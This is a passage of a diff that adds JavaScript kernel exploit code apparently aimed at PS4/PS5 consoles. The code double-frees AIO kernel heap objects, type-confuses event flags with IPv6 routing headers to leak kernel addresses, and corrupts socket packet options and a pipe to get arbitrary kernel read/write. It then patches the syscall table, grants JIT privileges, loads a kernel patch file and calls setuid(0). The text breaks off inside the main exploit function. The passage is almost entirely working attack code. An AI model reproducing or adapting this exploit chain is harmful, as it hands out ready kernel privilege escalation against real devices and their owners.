+ // address candidates. if the candidates truly are from the heap, they must
+ // share a common prefix
+ const heap_prefixes = [];
+
+ // check if offsets 0x10 to 0x20 look like a kernel heap address
+ for (let i = 0x10; i <= 0x20; i += 8) {
+ if (buf.read16(offset + i + 6) !== 0xffff) {
+ return false;
+ }
+ heap_prefixes.push(buf.read16(offset + i + 4));
+ }
+
+ // check reqs2.ar2_result.state
+ // state is actually a 32-bit value but the allocated memory was
+ // initialized with zeros. all padding bytes must be 0 then
+ let state = buf.read32(offset + 0x38);
+ if (!(0 < state && state <= 4) || buf.read32(offset + 0x38 + 4) !== 0) {
+ return false;
+ }
+
+ // reqs2.ar2_file must be NULL since we passed a bad file descriptor to
+ // aio_submit_cmd()
+ if (!buf.read64(offset + 0x40).eq(0)) {
+ return false;
+ }
+
+ // check if offsets 0x48 to 0x50 look like a kernel address
+ for (let i = 0x48; i <= 0x50; i += 8) {
+ if (buf.read16(offset + i + 6) === 0xffff) {
+ // don't push kernel ELF addresses
+ if (buf.read16(offset + i + 4) !== 0xffff) {
+ heap_prefixes.push(buf.read16(offset + i + 4));
+ }
+ // offset 0x48 can be NULL
+ } else if (i === 0x50 || !buf.read64(offset + i).eq(0)) {
+ return false;
+ }
+ }
+
+ return heap_prefixes.every((e, i, a) => e === a[0]);
+}
+
+function leak_kernel_addrs(sd_pair) {
+ close(sd_pair[1]);
+ const sd = sd_pair[0];
+ const buf = new Buffer(0x80 * leak_len);
+
+ // type confuse a struct evf with a struct ip6_rthdr. the flags of the evf
+ // must be set to >= 0xf00 in order to fully leak the contents of the rthdr
+ log('confuse evf with rthdr');
+ let evf = null;
+ for (let i = 0; i < num_alias; i++) {
+ const evfs = [];
+ for (let i = 0; i < num_handles; i++) {
+ evfs.push(new_evf(0xf00 | i << 16));
+ }
+
+ get_rthdr(sd, buf, 0x80);
+ // for simplicity, we'll assume i < 2**16
+ const flags32 = buf.read32(0);
+ evf = evfs[flags32 >>> 16];
+
+ set_evf_flags(evf, flags32 | 1);
+ get_rthdr(sd, buf, 0x80);
+
+ if (buf.read32(0) === flags32 | 1) {
+ evfs.splice(flags32 >> 16, 1);
+ } else {
+ evf = null;
+ }
+
+ for (const evf of evfs) {
+ free_evf(evf);
+ }
+
+ if (evf !== null) {
+ log(`confused rthdr and evf at attempt: ${i}`);
+ break;
+ }
+ }
+
+ if (evf === null) {
+ die('failed to confuse evf and rthdr');
+ }
+
+ set_evf_flags(evf, 0xff << 8);
+ get_rthdr(sd, buf, 0x80);
+
+ // fields we use from evf (number before the field is the offset in hex):
+ // struct evf:
+ // 0 u64 flags
+ // 28 struct cv cv
+ // 38 TAILQ_HEAD(struct evf_waiter) waiters
+
+ // evf.cv.cv_description = "evf cv"
+ // string is located at the kernel's mapped ELF file
+ const kernel_addr = buf.read64(0x28);
+ log(`"evf cv" string addr: ${kernel_addr}`);
+ // because of TAILQ_INIT(), we have:
+ //
+ // evf.waiters.tqh_last == &evf.waiters.tqh_first
+ //
+ // we now know the address of the kernel buffer we are leaking
+ const kbuf_addr = buf.read64(0x40).sub(0x38);
+ log(`kernel buffer addr: ${kbuf_addr}`);
+
+ // 0x80 < num_elems * sizeof(SceKernelAioRWRequest) <= 0x100
+ // allocate reqs1 arrays at 0x100 malloc zone
+ const num_elems = 6;
+ // use reqs1 to fake a aio_info. set .ai_cred (offset 0x10) to offset 4 of
+ // the reqs2 so crfree(ai_cred) will harmlessly decrement the .ar2_ticket
+ // field
+ const ucred = kbuf_addr.add(4);
+
+ const leak_reqs = make_reqs1(num_elems);
+ const leak_reqs_p = leak_reqs.addr;
+ leak_reqs.write64(0x10, ucred);
+
+ const leak_ids_len = num_handles * num_elems;
+ const leak_ids = new View4(leak_ids_len);
+ const leak_ids_p = leak_ids.addr;
+
+ log('find aio_entry');
+ let reqs2_off = null;
+ loop: for (let i = 0; i < num_leaks; i++) {
+ get_rthdr(sd, buf);
+
+ spray_aio(
+ num_handles,
+ leak_reqs_p,
+ num_elems,
+ leak_ids_p,
+ true,
+ AIO_CMD_WRITE,
+ );
+
+ get_rthdr(sd, buf);
+ for (let off = 0x80; off < buf.length; off += 0x80) {
+ if (verify_reqs2(buf, off)) {
+ reqs2_off = off;
+ log(`found reqs2 at attempt: ${i}`);
+ break loop;
+ }
+ }
+
+ free_aios(leak_ids_p, leak_ids_len);
+ }
+ if (reqs2_off === null) {
+ die('could not leak a reqs2');
+ }
+ log(`reqs2 offset: ${hex(reqs2_off)}`);
+
+ get_rthdr(sd, buf);
+ const reqs2 = buf.slice(reqs2_off, reqs2_off + 0x80);
+ log('leaked aio_entry:');
+ hexdump(reqs2);
+
+ const reqs1_addr = new Long(reqs2.read64(0x10));
+ log(`reqs1_addr: ${reqs1_addr}`);
+ reqs1_addr.lo &= -0x100;
+ log(`reqs1_addr: ${reqs1_addr}`);
+
+ log('searching target_id');
+ let target_id = null;
+ let to_cancel_p = null;
+ let to_cancel_len = null;
+ for (let i = 0; i < leak_ids_len; i += num_elems) {
+ aio_multi_cancel(leak_ids_p.add(i << 2), num_elems);
+
+ get_rthdr(sd, buf);
+ const state = buf.read32(reqs2_off + 0x38);
+ if (state === AIO_STATE_ABORTED) {
+ log(`found target_id at batch: ${i / num_elems}`);
+
+ target_id = new Word(leak_ids[i]);
+ leak_ids[i] = 0;
+ log(`target_id: ${hex(target_id)}`);
+
+ const reqs2 = buf.slice(reqs2_off, reqs2_off + 0x80);
+ log('leaked aio_entry:');
+ hexdump(reqs2);
+
+ const start = i + num_elems;
+ to_cancel_p = leak_ids.addr_at(start);
+ to_cancel_len = leak_ids_len - start;
+ break;
+ }
+ }
+ if (target_id === null) {
+ die('target_id not found');
+ }
+
+ cancel_aios(to_cancel_p, to_cancel_len);
+ free_aios2(leak_ids_p, leak_ids_len);
+
+ return [reqs1_addr, kbuf_addr, kernel_addr, target_id, evf];
+}
+
+// FUNCTIONS FOR STAGE: 0x100 MALLOC ZONE DOUBLE FREE
+
+function make_aliased_pktopts(sds) {
+ const tclass = new Word();
+ for (let loop = 0; loop < num_alias; loop++) {
+ for (let i = 0; i < num_sds; i++) {
+ tclass[0] = i;
+ ssockopt(sds[i], IPPROTO_IPV6, IPV6_TCLASS, tclass);
+ }
+
+ for (let i = 0; i < sds.length; i++) {
+ gsockopt(sds[i], IPPROTO_IPV6, IPV6_TCLASS, tclass);
+ const marker = tclass[0];
+ if (marker !== i) {
+ log(`aliased pktopts at attempt: ${loop}`);
+ const pair = [sds[i], sds[marker]];
+ log(`found pair: ${pair}`);
+ sds.splice(marker, 1);
+ sds.splice(i, 1);
+ // add pktopts to the new sockets now while new allocs can't
+ // use the double freed memory
+ for (let i = 0; i < 2; i++) {
+ const sd = new_socket();
+ ssockopt(sd, IPPROTO_IPV6, IPV6_TCLASS, tclass);
+ sds.push(sd);
+ }
+
+ return pair;
+ }
+ }
+
+ for (let i = 0; i < num_sds; i++) {
+ setsockopt(sds[i], IPPROTO_IPV6, IPV6_2292PKTOPTIONS, 0, 0);
+ }
+ }
+ die('failed to make aliased pktopts');
+}
+
+function double_free_reqs1(
+ reqs1_addr, kbuf_addr, target_id, evf, sd, sds,
+) {
+ const max_leak_len = (0xff + 1) << 3;
+ const buf = new Buffer(max_leak_len);
+
+ const num_elems = max_aio_ids;
+ const aio_reqs = make_reqs1(num_elems);
+ const aio_reqs_p = aio_reqs.addr;
+
+ const num_batches = 2;
+ const aio_ids_len = num_batches * num_elems;
+ const aio_ids = new View4(aio_ids_len);
+ const aio_ids_p = aio_ids.addr;
+
+ log('start overwrite rthdr with AIO queue entry loop');
+ let aio_not_found = true;
+ free_evf(evf);
+ for (let i = 0; i < num_clobbers; i++) {
+ spray_aio(num_batches, aio_reqs_p, num_elems, aio_ids_p);
+
+ if (get_rthdr(sd, buf) === 8 && buf.read32(0) === AIO_CMD_READ) {
+ log(`aliased at attempt: ${i}`);
+ aio_not_found = false;
+ cancel_aios(aio_ids_p, aio_ids_len);
+ break;
+ }
+
+ free_aios(aio_ids_p, aio_ids_len);
+ }
+ if (aio_not_found) {
+ die('failed to overwrite rthdr');
+ }
+
+ const reqs2 = new Buffer(0x80);
+ const rsize = build_rthdr(reqs2, reqs2.size);
+ // .ar2_ticket
+ reqs2.write32(4, 5);
+ // .ar2_info
+ reqs2.write64(0x18, reqs1_addr);
+ // craft a aio_batch using the end portion of the buffer
+ const reqs3_off = 0x28;
+ // .ar2_batch
+ reqs2.write64(0x20, kbuf_addr.add(reqs3_off));
+
+ // [.ar3_num_reqs, .ar3_reqs_left] aliases .ar2_spinfo
+ // safe since free_queue_entry() doesn't deref the pointer
+ reqs2.write32(reqs3_off, 1);
+ reqs2.write32(reqs3_off + 4, 0);
+ // [.ar3_state, .ar3_done] aliases .ar2_result.returnValue
+ reqs2.write32(reqs3_off + 8, AIO_STATE_COMPLETE);
+ reqs2[reqs3_off + 0xc] = 0;
+ // .ar3_lock aliases .ar2_qentry (rest of the buffer is padding)
+ // safe since the entry already got dequeued
+ //
+ // .ar3_lock.lock_object.lo_flags = (
+ // LO_SLEEPABLE | LO_UPGRADABLE
+ // | LO_RECURSABLE | LO_DUPOK | LO_WITNESS
+ // | 6 << LO_CLASSSHIFT
+ // | LO_INITIALIZED
+ // )
+ reqs2.write32(reqs3_off + 0x28, 0x67b0000);
+ // .ar3_lock.lk_lock = LK_UNLOCKED
+ reqs2.write64(reqs3_off + 0x38, 1);
+
+ const states = new View4(num_elems);
+ const states_p = states.addr;
+ const addr_cache = [aio_ids_p];
+ for (let i = 1; i < num_batches; i++) {
+ addr_cache.push(aio_ids_p.add((i * num_elems) << 2));
+ }
+
+ log('start overwrite AIO queue entry with rthdr loop');
+ let req_id = null;
+ close(sd);
+ sd = null;
+ loop: for (let i = 0; i < num_alias; i++) {
+ for (const sd of sds) {
+ set_rthdr(sd, reqs2, rsize);
+ }
+
+ for (let batch = 0; batch < addr_cache.length; batch++) {
+ states.fill(-1);
+ aio_multi_cancel(addr_cache[batch], num_elems, states_p);
+
+ const req_idx = states.indexOf(AIO_STATE_COMPLETE);
+ if (req_idx !== -1) {
+ log(`req_idx: ${req_idx}`);
+ log(`found req_id at batch: ${batch}`);
+ log(`states: ${[...states].map(e => hex(e))}`);
+ log(`states[${req_idx}]: ${hex(states[req_idx])}`);
+ log(`aliased at attempt: ${i}`);
+
+ const aio_idx = batch*num_elems + req_idx;
+ req_id = new Word(aio_ids[aio_idx]);
+ log(`req_id: ${hex(req_id)}`);
+ aio_ids[aio_idx] = 0;
+
+ // set .ar3_done to 1
+ poll_aio(req_id, states);
+ log(`states[${req_idx}]: ${hex(states[0])}`);
+ for (let i = 0; i < num_sds; i++) {
+ const sd2 = sds[i];
+ get_rthdr(sd2, reqs2);
+ const done = reqs2[reqs3_off + 0xc];
+ if (done) {
+ hexdump(reqs2);
+ sd = sd2;
+ sds.splice(i, 1);
+ free_rthdrs(sds);
+ sds.push(new_socket());
+ break;
+ }
+ }
+ if (sd === null) {
+ die("can't find sd that overwrote AIO queue entry");
+ }
+ log(`sd: ${sd}`);
+
+ break loop;
+ }
+ }
+ }
+ if (req_id === null) {
+ die('failed to overwrite AIO queue entry');
+ }
+ free_aios2(aio_ids_p, aio_ids_len);
+
+ // enable deletion of target_id
+ poll_aio(target_id, states);
+ log(`target's state: ${hex(states[0])}`);
+
+ const sce_errs = new View4([-1, -1]);
+ const target_ids = new View4([req_id, target_id]);
+ // PANIC: double free on the 0x100 malloc zone. important kernel data may
+ // alias
+ aio_multi_delete(target_ids.addr, 2, sce_errs.addr);
+
+ // we reclaim first since the sanity checking here is longer which makes it
+ // more likely that we have another process claim the memory
+ try {
+ // RESTORE: double freed memory has been reclaimed with harmless data
+ // PANIC: 0x100 malloc zone pointers aliased
+ const sd_pair = make_aliased_pktopts(sds);
+ return [sd_pair, sd];
+ } finally {
+ log(`delete errors: ${hex(sce_errs[0])}, ${hex(sce_errs[1])}`);
+
+ states[0] = -1;
+ states[1] = -1;
+ poll_aio(target_ids, states);
+ log(`target states: ${hex(states[0])}, ${hex(states[1])}`);
+
+ const SCE_KERNEL_ERROR_ESRCH = 0x80020003;
+ let success = true;
+ if (states[0] !== SCE_KERNEL_ERROR_ESRCH) {
+ log('ERROR: bad delete of corrupt AIO request');
+ success = false;
+ }
+ if (sce_errs[0] !== 0 || sce_errs[0] !== sce_errs[1]) {
+ log('ERROR: bad delete of ID pair');
+ success = false;
+ }
+
+ if (!success) {
+ die('ERROR: double free on a 0x100 malloc zone failed');
+ }
+ }
+}
+
+// FUNCTIONS FOR STAGE: MAKE ARBITRARY KERNEL READ/WRITE
+
+// k100_addr is double freed 0x100 malloc zone address
+// dirty_sd is the socket whose rthdr pointer is corrupt
+// kernel_addr is the address of the "evf cv" string
+function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
+ const psd = pktopts_sds[0];
+ const tclass = new Word();
+ const off_tclass = is_ps4 ? 0xb0 : 0xc0;
+
+ const pktopts = new Buffer(0x100);
+ const rsize = build_rthdr(pktopts, pktopts.size);
+ const pktinfo_p = k100_addr.add(0x10);
+ // pktopts.ip6po_pktinfo = &pktopts.ip6po_pktinfo
+ pktopts.write64(0x10, pktinfo_p);
+
+ log('overwrite main pktopts');
+ let reclaim_sd = null;
+ close(pktopts_sds[1]);
+ for (let i = 0; i < num_alias; i++) {
+ for (let i = 0; i < num_sds; i++) {
+ // if a socket doesn't have a pktopts, setting the rthdr will make
+ // one. the new pktopts might reuse the memory instead of the
+ // rthdr. make sure the sockets already have a pktopts before
+ pktopts.write32(off_tclass, 0x4141 | i << 16);
+ set_rthdr(sds[i], pktopts, rsize);
+ }
+
+ gsockopt(psd, IPPROTO_IPV6, IPV6_TCLASS, tclass);
+ const marker = tclass[0];
+ if ((marker & 0xffff) === 0x4141) {
+ log(`found reclaim sd at attempt: ${i}`);
+ const idx = marker >>> 16;
+ reclaim_sd = sds[idx];
+ sds.splice(idx, 1);
+ break;
+ }
+ }
+ if (reclaim_sd === null) {
+ die('failed to overwrite main pktopts');
+ }
+
+ const pktinfo = new Buffer(0x14);
+ pktinfo.write64(0, pktinfo_p);
+ const nhop = new Word();
+ const nhop_p = nhop.addr;
+ const read_buf = new Buffer(8);
+ const read_buf_p = read_buf.addr;
+ function kread64(addr) {
+ const len = 8;
+ let offset = 0;
+ while (offset < len) {
+ // pktopts.ip6po_nhinfo = addr + offset
+ pktinfo.write64(8, addr.add(offset));
+ nhop[0] = len - offset;
+
+ ssockopt(psd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+ sysi(
+ 'getsockopt',
+ psd, IPPROTO_IPV6, IPV6_NEXTHOP,
+ read_buf_p.add(offset), nhop_p,
+ );
+
+ const n = nhop[0];
+ if (n === 0) {
+ read_buf[offset] = 0;
+ offset += 1;
+ } else {
+ offset += n;
+ }
+ }
+ return read_buf.read64(0);
+ }
+
+ log(`kread64(&"evf cv"): ${kread64(kernel_addr)}`);
+ const kstr = jstr(read_buf);
+ log(`*(&"evf cv"): ${kstr}`);
+ if (kstr !== 'evf cv') {
+ die('test read of &"evf cv" failed');
+ }
+
+ // TODO FW dependent parts! assume ps4 8.0x for now
+
+ const off_kstr = 0x7edcff;
+ const kbase = kernel_addr.sub(off_kstr);
+ log(`kernel base: ${kbase}`);
+
+ log('\nmaking arbitrary kernel read/write');
+ const cpuid = 7 - main_core;
+ const off_cpuid_to_pcpu = 0x228e6b0;
+ const pcpu_p = kbase.add(off_cpuid_to_pcpu + cpuid*8);
+ log(`cpuid_to_pcpu[${cpuid}]: ${pcpu_p}`);
+ const pcpu = kread64(pcpu_p);
+ log(`pcpu: ${pcpu}`);
+ log(`cpuid: ${kread64(pcpu.add(0x30)).hi}`);
+ // __pcpu[cpuid].pc_curthread
+ const td = kread64(pcpu);
+ log(`td: ${td}`);
+
+ const off_td_proc = 8;
+ const proc = kread64(td.add(off_td_proc));
+ log(`proc: ${proc}`);
+ const pid = sysi('getpid');
+ log(`our pid: ${pid}`);
+ const pid2 = kread64(proc.add(0xb0)).lo;
+ log(`suspected proc pid: ${pid2}`);
+ if (pid2 !== pid) {
+ die('process not found');
+ }
+
+ const off_p_fd = 0x48;
+ const p_fd = kread64(proc.add(off_p_fd));
+ log(`proc.p_fd: ${p_fd}`);
+ // curthread->td_proc->p_fd->fd_ofiles
+ const ofiles = kread64(p_fd);
+ log(`ofiles: ${ofiles}`);
+
+ const off_p_ucred = 0x40;
+ const p_ucred = kread64(proc.add(off_p_ucred));
+ log(`p_ucred ${p_ucred}`);
+
+ const pipes = new View4(2);
+ sysi('pipe', pipes.addr);
+ const pipe_file = kread64(ofiles.add(pipes[0] * 8));
+ log(`pipe file: ${pipe_file}`);
+ // ofiles[pipe_fd].f_data
+ const kpipe = kread64(pipe_file);
+ log(`pipe pointer: ${kpipe}`);
+
+ const pipe_save = new Buffer(0x18); // sizeof struct pipebuf
+ for (let off = 0; off < pipe_save.size; off += 8) {
+ pipe_save.write64(off, kread64(kpipe.add(off)));
+ }
+
+ const main_sd = psd;
+ const worker_sd = dirty_sd;
+
+ const main_file = kread64(ofiles.add(main_sd * 8));
+ log(`main sock file: ${main_file}`);
+ // ofiles[sd].f_data
+ const main_sock = kread64(main_file);
+ log(`main sock pointer: ${main_sock}`);
+ // socket.so_pcb (struct inpcb *)
+ const m_pcb = kread64(main_sock.add(0x18));
+ log(`main sock pcb: ${m_pcb}`);
+ // inpcb.in6p_outputopts
+ const m_pktopts = kread64(m_pcb.add(0x118));
+ log(`main pktopts: ${m_pktopts}`);
+ log(`0x100 malloc zone pointer: ${k100_addr}`);
+
+ if (m_pktopts.ne(k100_addr)) {
+ die('main pktopts pointer != leaked pktopts pointer');
+ }
+
+ // ofiles[sd].f_data
+ const reclaim_sock = kread64(kread64(ofiles.add(reclaim_sd * 8)));
+ log(`reclaim sock pointer: ${reclaim_sock}`);
+ // socket.so_pcb (struct inpcb *)
+ const r_pcb = kread64(reclaim_sock.add(0x18));
+ log(`reclaim sock pcb: ${r_pcb}`);
+ // inpcb.in6p_outputopts
+ const r_pktopts = kread64(r_pcb.add(0x118));
+ log(`reclaim pktopts: ${r_pktopts}`);
+
+ // ofiles[sd].f_data
+ const worker_sock = kread64(kread64(ofiles.add(worker_sd * 8)));
+ log(`worker sock pointer: ${worker_sock}`);
+ // socket.so_pcb (struct inpcb *)
+ const w_pcb = kread64(worker_sock.add(0x18));
+ log(`worker sock pcb: ${w_pcb}`);
+ // inpcb.in6p_outputopts
+ const w_pktopts = kread64(w_pcb.add(0x118));
+ log(`worker pktopts: ${w_pktopts}`);
+
+ // get restricted read/write with pktopts pair
+ // main_pktopts.ip6po_pktinfo = &worker_pktopts.ip6po_pktinfo
+ const w_pktinfo = w_pktopts.add(0x10);
+ pktinfo.write64(0, w_pktinfo);
+ pktinfo.write64(8, 0); // clear .ip6po_nexthop
+ ssockopt(main_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+
+ pktinfo.write64(0, kernel_addr);
+ ssockopt(main_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+ gsockopt(worker_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+ const kstr2 = jstr(pktinfo);
+ log(`*(&"evf cv"): ${kstr2}`);
+ if (kstr2 !== 'evf cv') {
+ die('pktopts read failed');
+ }
+ log('achieved restricted kernel read/write');
+
+ // in6_pktinfo.ipi6_ifindex must be 0 (or a valid interface index) when
+ // using pktopts write. we can safely modify a pipe even with this limit so
+ // we corrupt that instead for arbitrary read/write. pipe.pipe_map will be
+ // clobbered with zeros but that's okay
+ class KernelMemory {
+ constructor(main_sd, worker_sd, pipes, pipe_addr) {
+ this.main_sd = main_sd;
+ this.worker_sd = worker_sd;
+ this.rpipe = pipes[0];
+ this.wpipe = pipes[1];
+ this.pipe_addr = pipe_addr; // &pipe.pipe_buf
+ this.pipe_addr2 = pipe_addr.add(0x10); // &pipe.pipe_buf.buffer
+ this.rw_buf = new Buffer(0x14);
+ this.addr_buf = new Buffer(0x14);
+ this.data_buf = new Buffer(0x14);
+ this.data_buf.write32(0xc, 0x40000000);
+ }
+
+ _verify_len(len) {
+ if (!(Number.isInteger(len) && (0 <= len <= 0xffffffff))) {
+ throw TypeError('len not a 32-bit unsigned integer');
+ }
+ }
+
+ copyin(src, dst, len) {
+ this._verify_len(len);
+ const main = this.main_sd;
+ const worker = this.worker_sd;
+ const addr_buf = this.addr_buf;
+ const data_buf = this.data_buf;
+
+ addr_buf.write64(0, this.pipe_addr);
+ ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+ data_buf.write64(0, 0);
+ ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, data_buf);
+
+ addr_buf.write64(0, this.pipe_addr2);
+ ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+ addr_buf.write64(0, dst);
+ ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+ sysi('write', this.wpipe, src, len);
+ }
+
+ copyout(src, dst, len) {
+ this._verify_len(len);
+ const main = this.main_sd;
+ const worker = this.worker_sd;
+ const addr_buf = this.addr_buf;
+ const data_buf = this.data_buf;
+
+ addr_buf.write64(0, this.pipe_addr);
+ ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+ data_buf.write32(0, 0x40000000);
+ ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, data_buf);
+
+ addr_buf.write64(0, this.pipe_addr2);
+ ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+ addr_buf.write64(0, src);
+ ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+ sysi('read', this.rpipe, dst, len);
+ }
+
+ _read(addr) {
+ const buf = this.rw_buf;
+ buf.write64(0, addr);
+ buf.fill(0, 8);
+ ssockopt(this.main_sd, IPPROTO_IPV6, IPV6_PKTINFO, buf);
+ gsockopt(this.worker_sd, IPPROTO_IPV6, IPV6_PKTINFO, buf);
+ }
+
+ read32(addr) {
+ this._read(addr);
+ return this.rw_buf.read32(0);
+ }
+
+ read64(addr) {
+ this._read(addr);
+ return this.rw_buf.read64(0);
+ }
+
+ write32(addr, value) {
+ this.rw_buf.write32(0, value);
+ this.copyin(this.rw_buf.addr, addr, 4);
+ }
+
+ write64(addr, value) {
+ this.rw_buf.write64(0, value);
+ this.copyin(this.rw_buf.addr, addr, 8);
+ }
+ }
+ const kmem = new KernelMemory(main_sd, worker_sd, pipes, kpipe);
+
+ const kstr3_buf = new Buffer(8);
+ kmem.copyout(kernel_addr, kstr3_buf.addr, kstr3_buf.size);
+ const kstr3 = jstr(kstr3_buf);
+ log(`*(&"evf cv"): ${kstr3}`);
+ if (kstr3 !== 'evf cv') {
+ die('pipe read failed');
+ }
+ log('achieved arbitrary kernel read/write');
+
+ // RESTORE: clean corrupt pointers
+ // pktopts.ip6po_rthdr = NULL
+ const off_ip6po_rthdr = 0x68;
+ const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
+ log(`reclaim rthdr: ${kmem.read64(r_rthdr_p)}`);
+ kmem.write64(r_rthdr_p, 0);
+ log(`reclaim rthdr: ${kmem.read64(r_rthdr_p)}`);
+
+ const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
+ log(`reclaim rthdr: ${kmem.read64(w_rthdr_p)}`);
+ log(kmem.read64(w_rthdr_p));
+ log(`reclaim rthdr: ${kmem.read64(w_rthdr_p)}`);
+
+ log('corrupt pointers cleaned');
+
+ /*
+ // REMOVE once restore kernel is ready for production
+ // increase the ref counts to prevent deallocation
+ kmem.write32(main_sock, kmem.read32(main_sock) + 1);
+ kmem.write32(worker_sock, kmem.read32(worker_sock) + 1);
+ // +2 since we have to take into account the fget_write()'s reference
+ kmem.write32(pipe_file.add(0x28), kmem.read32(pipe_file.add(0x28)) + 2);
+ */
+
+ return [kbase, kmem, p_ucred, [kpipe, pipe_save, pktinfo_p, w_pktinfo]];
+}
+
+// FUNCTIONS FOR STAGE: PATCH KERNEL
+
+async function get_patches(url) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ throw Error(
+ `Network response was not OK, status: ${response.status}\n`
+ + `failed to fetch: ${url}`);
+ }
+ return response.arrayBuffer();
+}
+
+// TODO 8.0x supported only
+async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
+ if (!is_ps4) {
+ throw RangeError('PS5 kernel patching unsupported');
+ }
+ if (!(0x800 <= version < 0x850)) {
+ throw RangeError('kernel patching unsupported');
+ }
+
+ log('change sys_aio_submit() to sys_kexec()');
+ // sysent[661] is unimplemented so free for use
+ const offset_sysent_661 = 0x11040c0;
+ const sysent_661 = kbase.add(offset_sysent_661);
+ // .sy_narg = 6
+ kmem.write32(sysent_661, 6);
+ // .sy_call = gadgets['jmp qword ptr [rsi]']
+ kmem.write64(sysent_661.add(8), kbase.add(0xe629c));
+ // .sy_thrcnt = SY_THR_STATIC
+ kmem.write32(sysent_661.add(0x2c), 1);
+
+ log('add JIT capabilities');
+ // TODO just set the bits for JIT privs
+ // cr_sceCaps[0]
+ kmem.write64(p_ucred.add(0x60), -1);
+ // cr_sceCaps[1]
+ kmem.write64(p_ucred.add(0x68), -1);
+
+ const buf = await get_patches('/kpatch/80x.elf');
+ // FIXME handle .bss segment properly
+ // assume start of loadable segments is at offset 0x1000
+ const patches = new View1(await buf, 0x1000);
+ let map_size = patches.size;
+ const max_size = 0x10000000;
+ if (map_size > max_size) {
+ die(`patch file too large (>${max_size}): ${map_size}`);
+ }
+ if (map_size === 0) {
+ die('patch file size is zero');
+ }
+ map_size = map_size+page_size & -page_size;
+
+ const prot_rwx = 7;
+ const prot_rx = 5;
+ const prot_rw = 3;
+ const exec_p = new Int(0, 9);
+ const write_p = new Int(max_size, 9);
+ const exec_fd = sysi('jitshm_create', 0, map_size, prot_rwx);
+ const write_fd = sysi('jitshm_alias', exec_fd, prot_rw);
+
+ const exec_addr = chain.sysp(
+ 'mmap',
+ exec_p,
+ map_size,
+ prot_rx,
+ MAP_SHARED|MAP_FIXED,
+ exec_fd,
+ 0,
+ );
+ const write_addr = chain.sysp(
+ 'mmap',
+ write_p,
+ map_size,
+ prot_rw,
+ MAP_SHARED|MAP_FIXED,
+ write_fd,
+ 0,
+ );
+
+ log(`exec_addr: ${exec_addr}`);
+ log(`write_addr: ${write_addr}`);
+ if (exec_addr.ne(exec_p) || write_addr.ne(write_p)) {
+ die('mmap() for jit failed');
+ }
+
+ log('mlock exec_addr for kernel exec');
+ sysi('mlock', exec_addr, map_size);
+
+ // mov eax, 0x1337; ret (0xc300_0013_37b8)
+ const test_code = new Int(0x001337b8, 0xc300);
+ write_addr.write64(0, test_code);
+
+ log('test jit exec');
+ sys_void('kexec', exec_addr);
+ let retval = chain.errno;
+ log('returned successfully');
+
+ log(`jit retval: ${retval}`);
+ if (retval !== 0x1337) {
+ die('test jit exec failed');
+ }
+
+ const pipe_save = restore_info[1];
+ restore_info[1] = pipe_save.addr;
+ log('mlock pipe save data for kernel restore');
+ sysi('mlock', restore_info[1], page_size);
+
+ mem.cpy(write_addr, patches.addr, patches.size);
+ sys_void('kexec', exec_addr, ...restore_info);
+
+ log('setuid(0)');
+ sysi('setuid', 0);
+ log('kernel exploit succeeded!');
+}
+
+// FUNCTIONS FOR STAGE: SETUP
+
+function setup(block_fd) {
+ // this part will block the worker threads from processing entries so that
+ // we may cancel them instead. this is to work around the fact that
+ // aio_worker_entry2() will fdrop() the file associated with the aio_entry
+ // on ps5. we want aio_multi_delete() to call fdrop()
+ log('block AIO');
+ const reqs1 = new Buffer(0x28 * num_workers);
+ const block_id = new Word();
+
+ for (let i = 0; i < num_workers; i++) {
+ reqs1.write32(8 + i*0x28, 1);
+ reqs1.write32(0x20 + i*0x28, block_fd);
+ }
+ aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
+
+ {
+ const reqs1 = make_reqs1(1);
+ const timo = new Word(1);
+ const id = new Word();
+ aio_submit_cmd(AIO_CMD_READ, reqs1.addr, 1, id.addr);
+ chain.do_syscall_clear_errno(
+ 'aio_multi_wait', id.addr, 1, _aio_errors_p, 1, timo.addr);
+ const err = chain.errno;
+ if (err !== 60) { // ETIMEDOUT
+ die(`SceAIO system not blocked. errno: ${err}`);
+ }
+ free_aios(id.addr, 1);
+ }
+
+ log('heap grooming');
+ // chosen to maximize the number of 0x80 malloc allocs per submission
+ const num_reqs = 3;
+ const groom_ids = new View4(num_grooms);
+ const groom_ids_p = groom_ids.addr;
+ const greqs = make_reqs1(num_reqs);
+ // allocate enough so that we start allocating from a newly created slab
+ spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
+ cancel_aios(groom_ids_p, num_grooms);
+ return [block_id, groom_ids];
+}
+
+// overview:
+// * double free a aio_entry (resides at a 0x80 malloc zone)
+// * type confuse a evf and a ip6_rthdr
+// * use evf/rthdr to read out the contents of the 0x80 malloc zone
+// * leak a address in the 0x100 malloc zone
+// * write the leaked address to a aio_entry
+// * double free the leaked address
+// * corrupt a ip6_pktopts for restricted r/w
+// * corrupt a pipe for arbitrary r/w
+//
+// the exploit implementation also assumes that we are pinned to one core
+export async function kexploit() {
+ const _init_t1 = performance.now();
+ await init();
+ const _init_t2 = performance.now();
+
+ // fun fact:
+ // if the first thing you do since boot is run the web browser, WebKit can
+ // use all the cores
+ const main_mask = new Long();
+ get_our_affinity(main_mask);
+ log(`main_mask: ${main_mask}`);
+
+ // pin to 1 core so that we only use 1 per-cpu bucket. this will make heap
+ // spraying and grooming easier
+ log(`pinning process to core #${main_core}`);
+ set_our_affinity(new Long(1 << main_core));
+ get_our_affinity(main_mask);
